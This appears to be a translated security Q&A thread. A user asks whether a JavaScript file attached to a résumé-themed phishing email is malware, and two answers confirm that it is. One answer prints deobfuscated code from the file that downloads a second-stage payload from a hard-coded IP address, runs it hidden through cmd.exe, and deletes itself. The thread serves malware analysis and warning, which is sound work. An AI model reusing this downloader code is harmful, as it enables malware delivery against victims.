所以我收到一封随机的电子邮件,上面写着这个。看起来非常自动化:
“情况如何?我在 2016 年 4 月 9 日访问了您的网站,我很感兴趣。我目前正在寻找全职或实习生的工作,以获得该领域的经验。请查看我的简历并让我知道你的想法。
然后附加一个javascript文件。我在 VirusTotal 上对其进行了扫描,发现只有 1/55。我打开文件查看文本并将其复制粘贴到此转储文件中,因为它很长。
任何熟悉 javascript 的人都可以确认它是不是病毒?
这是 Javascript 病毒吗?
信息安全
恶意软件
javascript
病毒
2021-08-11 19:20:36
2个回答
它肯定是恶意软件。它使用带有 ActiveX *和 VBScript 的 JavaScript 来下载和执行第二阶段的有效负载,该有效负载执行其他操作。虽然它是用 JavaScript 编写的,但它不会在浏览器中执行。相反,它在双击时在 Windows 脚本宿主中执行。这是文件中函数的去混淆和删节版本zQlMdib:
// download and execute stage 2 payload
function stage1_payload() {
// connect to server hosting stage 2 payload and download into memory
var http_obj = new ActiveXObject("MSXML2.XMLHTTP");
http_obj['open']("GET", "http://94.102.63.7/macbook_tutorial.mov", false);
http_obj['send']();
// evaluates true only if http connection succeeded
if (http_obj['Status'] == 200) {
// open activex objects for filesystem and file access
var fs_obj = new ActiveXObject("Scripting.FileSystemObject");
var file_obj = new ActiveXObject("ADODB.Stream");
// create and open temporary file (as binary) in system temporary folder
var temp_file = fs_obj['GetSpecialFolder'](2) + '\' + fs_obj['GetTempName']();
file_obj['Open']();
file_obj['Type'] = 1;
// save response body containing stage 2 payload to temporary file
file_obj['Write'](http_obj['ResponseBody']);
file_obj['Position'] = 0;
file_obj['SaveToFile'](temp_file);
file_obj['Close']();
// execute temporary file using command prompt
var shell_obj = new ActiveXObject("WScript.Shell");
shell_obj['run']('cmd.exe /c ' + temp_file, 0);
}
// delete currently-executing script (the js file you received)
var script_name = WScript['ScriptFullName'];
fs_obj['deleteFile'](script_name);
}
* 即使您的浏览器不支持 ActiveX,此文件也会在支持它的 Windows 脚本宿主中执行。
是的,它看起来像一个恶意代码。在浏览器的上下文中不允许使用这种类型的代码。此外,代码或多或少与Microsoft Internet Explorer 和Microsoft Windows 操作系统兼容,因为其他浏览器不支持Microsoft 的ActiveX 技术。
其它你可能感兴趣的问题